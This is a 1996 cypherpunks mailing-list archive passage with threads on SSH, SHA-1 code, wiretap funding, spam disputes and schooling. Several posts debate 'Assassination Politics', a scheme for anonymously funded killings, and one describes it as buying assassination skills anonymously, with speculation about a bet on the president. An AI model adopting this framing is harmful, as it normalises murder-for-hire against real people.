wrote: >> >> b. evidence that the "confession" can be backed up by other evidence >> > >In the case of the export at hand, a passport record exists, and surely >the notebook exists. Were I a prosecutor with a bug in my rectum, I would >think I had something of a case. What evidence of any sort do they have that any particular notebook computer was involved in the trip offshore? Seems to me this is a rather major defect in the evidence chain. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rah at shipwright.com Thu Sep 26 17:42:47 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 27 Sep 1996 08:42:47 +0800 Subject: Kid gets suspended for bomb info Message-ID: I'm sitting here, listening to National People's Radio, and they have this bit about a local kid who showed up in school today with 40 pages of bomb making info, "gotten off of the internet". He was "caught" when he showed his haul to his buddies. Much gnashing of teeth and flying of fur ensued, and the kid was sent home. More fun with numbers. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From bdavis at thepoint.net Thu Sep 26 17:44:33 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 27 Sep 1996 08:44:33 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <199609262012.NAA14242@mail.pacifier.com> Message-ID: On Thu, 26 Sep 1996, jim bell wrote: > At 01:27 PM 9/26/96 -0500, Jean-Francois Avon wrote: > >On 26 Sep 96 at 10:49, Brian Davis wrote: > > > >> If by "operation effectiveness" you mean some people will be killed, > >> I agree. I also agree with the fire/water comment (maybe in more > >> ways than one!); my comment related to my belief that AP-supporters > >> shouldn't complain about especially draconian measures taken against > >> them by governments, given their modus operandi. > > > >I don't think that any of them will complain because they understand > >the nature of it. I think that Jim Bell (forgive me Jim...:) view > >that there will be only limited retaliation from government is not > >guaranteed at all. As I said somewhere previously, the whole thing > >will depend on how the authorities view AP as (non-) attackable. > > > >Here is the post I wrote earlier: > > > >------- earlier post ------- > > > >jim bell recently wrote: > > > >> Local police action against an AP organization would, of course, be > >> deterred by the prospect of naming anybody who would go after it, > >> and soliciting donations against them. > > > >I don't agree here. It would all be a matter of timing, unless the > >number of AP servers would be sprouting out faster than police forces > >would be able to destroy them. You have to realize that if the money > >is seized, noboby will be willing to make a hit since the odds of > >being paid are not too good. Just play the game "Command and Conquer" > >for a while and you'll see. Money is fuel. Don't run off of it! > > Uh, okay, I didn't mean to suggest that attacks would be entirely > eliminated. (The term "deterred" really needed to be quantified there, even > for a native English speaker.) > > But my main point was that (as evidenced by Brian Davis' unwillingness to > acknowledge that the people who run the system will engage in illegality to > stop AP) there is a certain hesitancy on the part of the "ruling class" to > abandon at least the facade of legality that they often promote. You have misinterpreted me or I was unclear. I don't doubt that, at some point, the group of people who generally follow the rule of written law might skip over some of the more restrictive parts of that law to combat incessant violence. That is what I meant by "especially draconian measures"; I know you agree that such a response is logical and proper under the circumstances. :-) EBD > > > > > Jim Bell > jimbell at pacifier.com > From cadams at acucobol.com Thu Sep 26 18:03:27 1996 From: cadams at acucobol.com (Chris Adams) Date: Fri, 27 Sep 1996 09:03:27 +0800 Subject: Internet plug pulled on Colombia's guerrillas Message-ID: <324AFE43.46BE@acucobol.com> Internet plug pulled on Colombia's guerrillas 3:05pm EDT, 9/26/96 BOGOTA, Colombia - A Colombian guerrilla group currently involved in a bloody offensive in the mountains and jungles, suffered a setback in its propaganda battle when its new-tech voice on the Internet was mysteriously silenced. The Revolutionary Armed Forces of Colombia (FARC), which has periodically paralyzed half the country with road blocks, found its route to the information superhighway barred. The Communist insurgents, who rose up in arms in 1964, embraced new technology last year in their fight to overthrow the government by launching a home page on the Internet. But in unexplained circumstances, which a spokeswoman for the Mexico City-based Internet provider Teesnet said may or may not be linked to external pressures, the plug was pulled on the service Monday -- a day after being publicized in Colombia's leading daily, El Tiempo. The FARC's Mexico City-based international spokesman Marco LeDon CalarcDa admitted the loss of the Internet page was a serious reversal but vowed the computer-age conflict was far from over. "This is an attack on freedom of expression because we were not doing anything illegal. I cannot say exactly how it happened but the hand of the Colombian government is in this," he said. "The FARC is used to difficulties and this is just the latest challenge. One way or another we will get back on to the Internet." The Colombian guerrillas used their worldwide web site to publish their political magazine Resistencia, whose distribution is banned in Colombia, and to offer explanations about their latest armed actions. FARC, labeled narcoguerrillas since the 1980s when U.S. ambassador Lewis Tambs highlighted the group's alleged connections with Colombia's drugs trade, have been dubbed Cyberspace guerrillas since their appearance on the Internet. "Cyberspace guerrillas may seem a fun name but I think it is pejorative and belittles what we're doing," said LeDon CalarcDa. "We are looking to topple the government and set up a new Colombia. "Using weapons naturally comes within the logic of the armed struggle. Just fighting through the Internet would be like shooting rubber bullets. Not using it would be like continuing to fight the army with a 12-bore shotgun," he said. In the four weeks since the FARC unleashed its latest offensive with an attack on a jungle base in southern Putumayo province, more than 150 soldiers, police and civilians have died. From bdavis at thepoint.net Thu Sep 26 18:06:33 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 27 Sep 1996 09:06:33 +0800 Subject: Lexis and Privacy - Bill approaches. In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Declan McCullagh wrote: > Dear PhneCards, > > Please stop using my email address as part of an inappropriate email > bomb. If this continues, I will be forced to persecute your return > email address. > > Now we don't want that to happen, do we? > > -Declan > On Wed, 25 Sep 1996 PhneCards at aol.com wrote: > > > > > Did you know this company is using your email address as part of > > an unlawful email bomb? > > > > I would advise you to write to them at cypherpunks at toad.com > > and owner-cypherpunks at toad.com and advise them to stop > > using your email address for this type of activity. > > > > It is illegal to use a invalid return email address. If this continues, I > > will > > be forced to prosecute the return email address - which they are > > making to look like you. I got a similar message from those idiots and replied off list (part of my email bomb, I guess). There email is terrific -- save it for evidence. They *admit* that they know you aren't doing what they are complaining about, but threaten to sue you anyway. I hope there lawyers have read Civil Rule 11 ... on second thought, I hope they haven't!$$$$$! EBD From dwa at corsair.com Thu Sep 26 18:12:06 1996 From: dwa at corsair.com (Dana W. Albrecht) Date: Fri, 27 Sep 1996 09:12:06 +0800 Subject: ssh - How widely used? Message-ID: <199609262257.PAA05678@vishnu.corsair.com> Black Unicorn writes: > Does anyone know if there are MS-Dos or Mac versions of the ssh client? There is no MS-DOS client. The authors claim that, "a Macintosh version is in the works, and first versions are expected to be available in August/September 1996." There are Windoze and OS/2 clients. > How much is ssh used? >From the FAQ: 6.2 How widespread is use of ssh? As with every piece of freely available software, this is difficult to find out. The best current estimates are that at least 1000 insitutions in 40 countries use it. This estimate is based on The number of people on the ssh mailing list, around 600, from 40 different countries and several hundred domains. Each week, the ssh home pages are accessed from roughly 5000 different machines, many of them web caches; also, these machines often are different from week to week. > I've not seen much discussion of it but poking around an ISP yielded this: > > Ssh (Secure Shell) a program for logging into a remote > machine and for executing commands in a remote machine. > It is intended to replace rlogin and rsh, and provide > secure encrypted communications between two untrusted > hosts over an insecure network. X11 connections and arbi- > trary TCP/IP ports can also be forwarded over the secure > channel. [ Snip ] > Looks like a nice little implementation. > > Comments anyone? For further information about it, see: http://www.cs.hut.fi/ssh/ There is also a mailing list. Subscription requests should be directed to majordomo at clinet.fi with "subscribe ssh" in the message body. I think that it's technically a great program. However, I have heard some pretty unpleasant stories about legal issues using it in a commercial environment. Dana W. Albrecht dwa at corsair.com From pgf at acadian.net Thu Sep 26 18:57:34 1996 From: pgf at acadian.net (Phil Fraering) Date: Fri, 27 Sep 1996 09:57:34 +0800 Subject: Weaknesses in Smart Cards? (Re: FLA_wed) In-Reply-To: Message-ID: On Thu, 26 Sep 1996, Timothy C. May wrote: [... much deleted but boiling down to: ] > Not a good journalistic trend, in my opinion. Yah, but since 40-bit cyphers is seen by the "media" as something most people don't use, but "smart cards" are just another type of fraud-resistant credit card being used by Everyone Already, of course, they have to start a stampede now. I wonder if this isn't just plain Fear, Uncertainty, and Doubt rearing its ugly head... does Lucent (they were the ones, right?) have a competing product? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From adam at homeport.org Thu Sep 26 19:02:27 1996 From: adam at homeport.org (Adam Shostack) Date: Fri, 27 Sep 1996 10:02:27 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: <199609270039.TAA05797@homeport.org> Theres a windows version, mac is under vauge development. SSH is pretty cool, but the code base is somewhat messy, and its shows signs of its origins in things like systems calls not having their return values checked. Despite all this, I use it, like it, and recomend it for use in systems not likely to come under attack by professionals. Adam Black Unicorn wrote: | Does anyone know if there are MS-Dos or Mac versions of the ssh client? | How much is ssh used? | | I've not seen much discussion of it but poking around an ISP yielded this: | | Ssh (Secure Shell) a program for logging into a remote | machine and for executing commands in a remote machine. | It is intended to replace rlogin and rsh, and provide | secure encrypted communications between two untrusted | hosts over an insecure network. X11 connections and arbi- | trary TCP/IP ports can also be forwarded over the secure | channel. -- "It is seldom that liberty of any kind is lost all at once." -Hume From steve at edmweb.com Thu Sep 26 19:16:02 1996 From: steve at edmweb.com (Steve Reid) Date: Fri, 27 Sep 1996 10:16:02 +0800 Subject: Public domain SHA-1 in C Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I've written an implementation of SHA-1 in C. Public domain, so you can hack it to your hearts content and/or use it however you want. You can download it from http://www.edmweb.com/steve/sha1.c It's not hard to use. Allocate a SHA1_CTX, initialize it with SHA1Init() run over the data with SHA1Update() and finally extract the result using SHA1Final(). Or just compile the program as-is and use it to hash files. It's reasonably fast (the 80 core SHA operations look good) but I'm certain that there's room for improvement. Tested under FreeBSD 2.1.0-RELEASE on an i486SX. The three test vectors from FIPS PUB 180-1 hash correctly. ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve at edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQEVAwUBMksSsNtVWdufMXJpAQFV3AgApaK+upwWtBJZUwq5Pr4cpvjWQcxFHxv6 XEoZmwgwzR94lpjdEK5GPXt7U9HTp+xiwiaeQ7Hjg+iuR/qtofwZlZhQ5EmyBl2M 8rnFSRgwR4NH1y2PwAxQKSo2SaHU8JZ3X3D6Yk1WXAqk90vN8dzQAIa8B409IuhM tBPixrS6d0KsySSOHQkWO7Mqij43wZOnrgikJF3IDCvSf0us8gGC9wZjdIax3Rgr soswtQvT6QpZDZ/+39UiA2RSMFuER/S3NbZZSJdfIGK1XzUeU2MUC4NmURlc/ntz 3B1pd+jovxuHW1D/TQ2jHSIdg1Yol/zeu1OeuuhL37QOQAVkupgVUA== =B73M -----END PGP SIGNATURE----- From snow at smoke.suba.com Thu Sep 26 19:19:49 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 10:19:49 +0800 Subject: Public Schools In-Reply-To: <3.0b19.32.19960923103721.00a13340@panix.com> Message-ID: <199609262259.RAA00119@smoke.suba.com> > > On Sun, 22 Sep 1996, snow wrote: > >I would agree that parents can do as good or better at _most_ > >subjects thru about the 3rd or 4th grade, and I do agree that > >most of todays schools are shit, however there is one area-- > >social skills--that homeschooling simply can't compete. > > >From John Holt's "Teach Your Own" > > "If there were no other reason to homeschool your children, protecting them > from the 'valuable social atmosphere' of the schools would be sufficient." > John was a commie liberal BTW. He felt that the schools had a very nasty > and artificial social environment with rigid age segregation that bore no > resemblance to real life where there are people of wider age ranges. > Certainly, most people suffer worse mistreatment from their "peers" at > school than they do later in life. > As a libertarian, I would add that the social atmosphere of a Stalinist > "brain factory" is not exactly the socialization I would choose for my > children. I would choose a more market oriented model. As I indicated (or at least tried to) I am not satisfied with the way that schools are run. I _don't_ think that this seperation into classes by age is a good idea, I don't believe that self esteem is more important than learning. However I DO believe that socialization is necessary. I do believe that the torture we all endured (and I as much or more than most) from our fellow students helps us later in life. If nothing else it teaches us that our fellow "humans" are not "humane". I think a more more market oriented model would be a good idea, assuming that you mean a model designed to produce a product--well educated young adults--and not simply "worker factories". Petro, Christopher C. petro at suba.com snow at smoke.suba.com From declan at well.com Thu Sep 26 19:20:16 1996 From: declan at well.com (Declan McCullagh) Date: Fri, 27 Sep 1996 10:20:16 +0800 Subject: CWD -- Wiretap In the Night Message-ID: ---------- Forwarded message ---------- Date: Thu, 26 Sep 1996 16:32:01 -0700 (PDT) From: Declan McCullagh To: fight-censorship at vorlon.mit.edu Subject: CWD -- Wiretap In the Night CyberWire Dispatch // September // Copyright (c) 1996 // Jacking in from the "Smoked Filled Room" Port: Washington, DC -- Federal provisions funding the digital telephony bill and roving wiretaps, surgically removed earlier this year from an anti-terrorism bill, have quietly been wedged into a $600 billion omnibus spending bill. The bill creates a Justice Department "telecommunications carrier compliance fund" to pay for the provisions called for in the digital telephony bill, formally known as the Communications Assistance in Law Enforcement Act (CALEA). In reality, this is a slush fund. Congress originally budgeted $500 million for CALEA, far short of the billions actually needed to build in instant wiretap capabilities into America's telephone, cable, cellular and PCS networks. This bill now approves a slush fund of pooled dollars from the budgets of "any agency" with "law enforcement, national security or intelligence responsibilities." That means the FBI, CIA, NSA and DEA, among others, will now have a vested interest in how the majority of your communications are tapped. The spending bill also provides for "multipoint wiretaps." This is the tricked up code phase for what amounts to roving wiretaps. Where the FBI can only tap one phone at a time in conjunction with an investigation, it now wants the ability to "follow" a conversation from phone to phone; meaning that if your neighbor is under investigation and happens to use your phone for some reason, your phone gets tapped. It also means that the FBI can tap public pay phones... think about that next time you call 1-800-COLLECT. In addition, all the public and congressional accountability provisions for how CALEA money was spent, which were in the original House version (H.R. 3814), got torpedoed in the Senate Appropriations Committee. Provisions stripped out by the Senate: -- GONE: Money isn't to be spent unless an implementation plan is sent to each member of the Judiciary Committee and Appropriations committees. -- GONE: Requirement that the FBI provide public details of how its new wiretap plan exceeds or differs from current capabilities. -- GONE: Report on the "actual and maximum number of simultaneous surveillance/intercepts" the FBI expects. The FBI ran into a fire storm earlier this year when it botched its long overdue report that said it wanted the capability to tap one out of every 100 phones *simultaneously*. Now, thanks to this funding bill, rather than having to defend that request, it doesn't have to say shit. -- GONE: Complete estimate of the full costs of deploying and developing the digital wiretapping plan. -- GONE: An annual report to Congress "specifically detailing" how all taxpayer money -- YOUR money -- is spent to carry out these new wiretap provisions. "No matter what side you come down on this (digital wiretapping) issue, the stakes for democracy are that we need to have public accountability," said Jerry Berman, executive director of the Center for Democracy and Technology. Although it appeared that no one in congress had the balls to take on the issue, one stalwart has stepped forward, Rep. Bob Barr (R-Ga.). He has succeeded in getting some of the accountability provisions back into the bill, according to a Barr staffer. But the fight couldn't have been an easy one. The FBI has worked congress relentlessly in an effort to skirt the original reporting and implementation requirements as outlined in CALEA. Further, Barr isn't exactly on the FBI's Christmas card list. Last year it was primarily Barr who scotched the funding for CALEA during the 104th Congress' first session. But Barr has won again. He has, with backing from the Senate, succeeded in *putting back* the requirement that the FBI must justify all CALEA expenditures to the Judiciary Committee. Further, the implementation plan, "though somewhat modified" will "still have some punch," Barr's staffer assured me. That includes making the FBI report on its expected capacities and capabilities for digital wiretapping. In other words, the FBI won't be able to "cook the books" on the wiretap figures in secret. Barr also was successful in making the Justice Department submit an annual report detailing its CALEA spending to Congress. However, the funding for digital wiretaps remains. Stuffing the funding measures into a huge omnibus spending bill almost certainly assures its passage. Congress is twitchy now, anxious to leave. They are chomping at the bit, sensing the end of the 104th Congress' tortured run as the legislative calender is due to run out sometime early next week. Then they will all literally race from Capitol Hill at the final gavel, heading for the parking lot, jumping in their cars like stock car drivers as they make a made dash for National Airport to return to their home districts in an effort to campaign for another term in the loopy world of national politics. Congress is "going to try to sneak this (spending bill) through the back door in the middle of the night," says Leslie Hagan, legislative director for the National Association of Criminal Defense Lawyers. She calls this a "worst case scenario" that is "particularly dangerous" because the "deliberative legislative process is short-circuited." Such matters as wiretapping deserve to be aired in the full sunlight of congressional hearings, not stuffed into an 11th hour spending bill. This is legislative cowardice. Sadly, it will most likely succeed. And through this all, the Net sits mute. Unlike a few months ago, on the shameful day the Net cried "wolf" over these same provisions, mindlessly flooding congressional switchboards and any Email box within keyboard reach, despite the fact that the funding provisions had been already been stripped from the anti-terrorism bill, there has been no hue-and-cry about these most recent moves. Yes, some groups, such as the ACLU, EPIC and the Center for Democracy and Technology have been working the congressional back channels, buzzing around the frenzied legislators like crazed gnats. But why haven't we heard about all this before now? Why has this bill come down to the wire without the now expected flurry of "alerts" "bulletins" and other assorted red-flag waving by our esteemed Net guardians? Barr's had his ass hanging in the wind, fighting FBI Director Louis "Teflon" Freeh; he could have used some political cover from the cyberspace community. Yet, if he'd gone to that digital well, he'd have found only the echo of his own voice. And while the efforts of Rep. Barr are encouraging, it's anything from a done deal. "As long as the door is cracked... there is room for mischief," said Barr's staffer. Meaning, until the bill is reported and voted on, some snapperhead congressman could fuck up the process yet again. We all caught a bit of a reprieve here, but I wouldn't sleep well. This community still has a lot to learn about the Washington boneyard. Personally, I'm a little tired of getting beat up at every turn. Muscle up, folks, the fight doesn't get any easier. Meeks out... ------------ Declan McCullagh contributed to this report. ### From craigw at dg.ce.com.au Thu Sep 26 19:34:55 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Fri, 27 Sep 1996 10:34:55 +0800 Subject: An idle thought on CBC and block lengths Message-ID: <199609262359.JAA18913@mac.ce.com.au> Well I do believe that your spam would be illegal if that was the case. And secondly there are no laws here in australia that you can use to prosecute me from the US for an email bomb, not that this is one, and if it is than so is your spam. >> It is illegal to use a invalid return email address. If this continues, I >> will >> be forced to prosecute the return email address - which they are >> making to look like you. >Is it? I beleive that if you look closely, you will discover hat all the >laws which would have made lying illegal on the 'Net have now been >repealed by more Federal judges than I can count on 1 hand... ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From snow at smoke.suba.com Thu Sep 26 19:56:42 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 10:56:42 +0800 Subject: possible solution to cyber S/N In-Reply-To: <199609231847.LAA29832@netcom5.netcom.com> Message-ID: <199609262329.SAA00222@smoke.suba.com> Mr. Nuri wrote: > in the scientific arena. a paper that is pivotal and influential > is referred to ad infinitum. obscure papers are forgotten and > never referred to in subsequent literature. > taking this idea to the cyberspace arena, the application is > immediately obvious-- pages that are linked to by a lot of > other pages are valuable, those that are not are not as > valuable. I'd bet that there are more links to playboy.com or "xxx.sex.com" than to thomas.loc.gov. This suffers from the fatal flaw of democracy, the assumption that one million people are smarter than 10. Who was it that said "No one ever went broke underestimating the intelligence of the average american"? Petro, Christopher C. petro at suba.com snow at smoke.suba.com From ponder at freenet.tlh.fl.us Thu Sep 26 20:01:06 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Fri, 27 Sep 1996 11:01:06 +0800 Subject: NIST conference Message-ID: Following is an announcement about a NIST conference on leveraging the distributed nature of the Internet to accomplish tasks that might be otherwise not feasible. The abstract notes that this type of activity has 'important economic, social, and political consequences'. This may already be old news, I was off the list for the past few days. Date: Thu, 26 Sep 1996 15:18:08 -0400 From: Liz Lennon Subject: Cyber Conference Announcement To: csl-bulletin at NIST.GOV >Return-Path: >Date: Thu, 26 Sep 1996 15:00:46 -0400 (EDT) >From: Judi Moline >Subject: Cyber Conference Announcement >To: elizabeth.lennon at NIST.GOV >Cc: moline at sst.ncsl.nist.gov > > >Event: Conference on Leveraging Cyberspace > >Date: October 8-9, 1996 > >Purpose: People with shared interests are using the Internet to >solve problems, accomplish tasks, and create resources that would be well >beyond the reach of any one person or organization. The ability to leverage >the efforts of large numbers of networked users has important economic, >social, and political consequences. This conference is designed to explore >this phenomenon from both a technical and social science perspective. >Additionally, the closing session of the conference will cap off several >weeks of virtual discussions on the conference's web site. > >Location: Xerox Palo Alto Research Center (PARC) > Palo Alto, Calif. > >Keynote by: John Seely Brown, Vice President and Chief Scientist, > Xerox > >Program: Web: http://nii.nist.gov/cyber/cyber_conf.html > >Registration: $200 > >Sponsors: White House National Economic Council > Commerce's National Institute of Standards and > Technology > Xerox Palo Alto Research Center > >Technical contact: Judi Moline, NIST > (301) 975-4601 > email: jmoline at nist.gov > >Information: Web: http://nii.nist.gov/cyber/cyber_conf.html > >To register: Print registration form from web site and return with > payment to: > Office of the Comptroller > NIST > A807 Administration Building > Gaithersburg, Md. 20899-0001 USA > > Or fax to: > Lori Phillips, NIST > fax: (301) 948-2067 > > Or: > Lori.Phillips at nist.gov > > > From roger at coelacanth.com Thu Sep 26 20:49:33 1996 From: roger at coelacanth.com (Roger Williams) Date: Fri, 27 Sep 1996 11:49:33 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: Rats, just a clarification: >>>>> "I" == Roger Williams blurted out: > There is certainly a Mac version... Umm, Machten, that is. I don't think that the straight Mac version has been released for beta yet. > The SSH home page is . Or at http://www.cs.hut.fi/ssh/, if you want it in *English*... -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From snow at smoke.suba.com Thu Sep 26 21:04:53 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 12:04:53 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: <199609270005.TAA00319@smoke.suba.com> Mr. May wrote: > At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: > >like Markof are somewhat more responsible. This is not going to stop me > >from producing an op-ed piece linkiing the net libertarians to assasination > >politics unless I hear a few more repudiations of Bell's ideas. If you > >don't very clearly reject his murderous ideas you are going to regret it > >just as the left regreted having the USSR or the RAF associated with them. > I for one don't respond well to extortion threats, so write your damned article. I agree with Mr. May, and I will go so far as you call you a coward and a thoroughly lousy human being. I don't LIKE the idea of AP being necessary, and I am hoping that things get better before someone get's desperate enough to implement it. On the other hand, I like living in a cage of someone elses making. If I choose to restrict my life, it is mine to restrict. I don't want you to have that ability. You obviously come from a family that believes it is Ok to "Rule" people. I wrote some fairly hostile shit about you and your family, but that is pretty irrelevant to this list, so I disgarded it. I will, however, say that you are a bloody fascist peice of work. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Thu Sep 26 21:14:12 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 12:14:12 +0800 Subject: Tamper-Resistant Software from INTEL In-Reply-To: <199609242330.SAA16789@oak.zilker.net> Message-ID: <199609270057.TAA00414@smoke.suba.com> Mr. Guthery > Has anybody heard of tamper-resistant software in general or a method > for tamper-resistant software from Intel in particular? What do you mean by "tamper resistant"? Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jya at pipeline.com Thu Sep 26 21:23:31 1996 From: jya at pipeline.com (John Young) Date: Fri, 27 Sep 1996 12:23:31 +0800 Subject: NISSC Message-ID: <199609270103.BAA27705@pipe2.ny2.usa.pipeline.com> The National Information Systems Security Conference in Baltimore on October 22-25 is bountifully described at: http://csrc.nist.gov/nissc/program Section No. 10, Solutions, will interest those who want a peek at what the Puzzle Palace gang is up to. The other nine sessions cover everything the info-sec gov-biz wants to do to make the infoworld safe from everyone except them. From roger at coelacanth.com Thu Sep 26 21:23:33 1996 From: roger at coelacanth.com (Roger Williams) Date: Fri, 27 Sep 1996 12:23:33 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: >>>>> Black Unicorn writes: > Does anyone know if there are MS-Dos or Mac versions of the ssh > client? How much is ssh used? There is certainly a Mac version, as well as ones for OS/2 and probably every Unix platform. There's also a Windows client. (We use SSH on OS/2 and Linux, but haven't yet had to try the Windows client.) The SSH home page is . -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From shamrock at netcom.com Thu Sep 26 21:29:08 1996 From: shamrock at netcom.com (Lucky Green) Date: Fri, 27 Sep 1996 12:29:08 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: On Thu, 26 Sep 1996, Black Unicorn wrote: > > Does anyone know if there are MS-Dos or Mac versions of the ssh client? > How much is ssh used? Uni, SSH is used, as most security software is, by security aware individuals. I would love to say that means "widely", but unfortunately that isn't the case. For what is worth, SSH has my personal seal of approval. Use it. The UNIX version is freeware. The Windows version is commercially available at http://www.datafellows.com/ --Lucky From snow at smoke.suba.com Thu Sep 26 21:30:05 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 12:30:05 +0800 Subject: Bork book In-Reply-To: <3247E5B8.6181@tivoli.com> Message-ID: <199609270016.TAA00338@smoke.suba.com> Mr. Nally wrote: > Bork came across as kind-of a jerk, personality-wise. I listened to him speak on Mr. Limbaugh's show the other day where the round mound of sound all but blew him on the air. He didn't come across as a jerk to me. More like a facist prick. If he had made it to the Supreme Court, there is no doubt in my mind where he would fall on the crypto debate. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From drink at aa.net Thu Sep 26 21:30:14 1996 From: drink at aa.net (! Drive) Date: Fri, 27 Sep 1996 12:30:14 +0800 Subject: PGP interfaces for MS Internet Mail Message-ID: <199609270008.RAA16947@ws6.aa.net> Does anyone know of any PGP programs that interface well with Microsofts Internet Mail (not Exchange mail) Thanks From snow at smoke.suba.com Thu Sep 26 21:36:24 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 12:36:24 +0800 Subject: AP Protocol Failures [NOISE] In-Reply-To: <199609241701.NAA16848@attrh1.attrh.att.com> Message-ID: <199609270037.TAA00384@smoke.suba.com> > >> Troops are in Northern Ireland for a very simple and depressing > >> reason. People like Jim want to impose their will on others by force. > But AP is great - adding more violence to Ireland is just the thing > they need........ It wouldn't ADD more violence. > One of the strong negatives of AP is that it leads to reverse AP - > if you don't know _which_ Hatfield killed the latest McCoy, > you might as well just shoot one or two Hatfield Boys at random. > If you kill off GrandDaddy Hatfield, there's nobody to say > "OK, let's stop shooting each other"; instead there's a bunch of > angry grandkids, and uncles, _all_ of whom have the > authority to say "Let's go kill the McCoy bastards who did this!" > The protocols may work when there's one hierarchical target - > they don't work with two. Hammurabi's law about "An eye for an eye > and a tooth for a tooth" was a _limitation_ on the amount of vengeance > you were allowed to take, not a minimum required vengeance. Putting AP into place doesn't make murder legal. You could still be arrested, tried (depending on the jurisdiction) and punished for it. All AP allows is people who don't have the skills necessary to do the job pay for it. Wait, that didn't come out right. AP simply allows people without the assination skill set to purchase access to those skill sets annonymously. There are many, many people out there who are either too squemish to kill, or are philosophically opposed to killing. They won't use this system. There are many other without the skills nessary to kill higher level targets without getting caught. Without getting caught. That is the key. There is a very good chance would AP be implemented that someone might put make a bet on me. I tend to piss people off. I am also a slightly harder target than Joe Average. Not much, because of the neighborhood I live in. Around here you could probably buy my death for a $100 bucks worth of crack. Of course, the police will investigate, and since I am white, and not involved with gangs and drugs, they might even bother to find out who wacked me. If someone hits Bill Clinton, then there is a very good chance that many many people will be wondering who won the bet. While it isn't possbile (assuming here) to trace the bet side, the assination is an event that takes place in the real world where physical evidence is considerably difficult to obscure. There will be people looking for both killers, but I'd bet that the people investigating Clintons death would be much more likely to be bet against than those investigating mine. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From markm at voicenet.com Thu Sep 26 21:45:29 1996 From: markm at voicenet.com (Mark M.) Date: Fri, 27 Sep 1996 12:45:29 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 26 Sep 1996, Black Unicorn wrote: > Does anyone know if there are MS-Dos or Mac versions of the ssh client? There isn't a Mac version yet, but there is a beta version for Windows. Information is available at http://www.ssh.fi. > How much is ssh used? It seems to be pretty widespread. A lot of security conscious ISP's run sshd and I think there will be an RFC on ssh eventually. > Looks like a nice little implementation. > > Comments anyone? It's really a very good program. The code is huge, so it is somewhat difficult to really be certain that there aren't any holes somewhere in the program. There also isn't much key management which makes MITM attacks easier. But that would make it even more complex. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkscHyzIPc7jvyFpAQE3iAf8D80eJCWEa2V5JInK6Lv83Od6PkF/BONp iTzjUZVXW8Qj01aYaMbyLV+StmqHYheBgMX0IKuGM4jrTSQyNTKY9nH83EaVY73/ jGHqeRdBRWNqyPHifWyDSmma7PH7CqYms2FRW+4OKJ7FgDIFmQ1/CV2dtbmrEikB 61+iP0RXvOevWCWmwXQTXOaNbzAD/yo9KGQN1R0U4Aoma9+eS7tEsJSDSWXM63/r 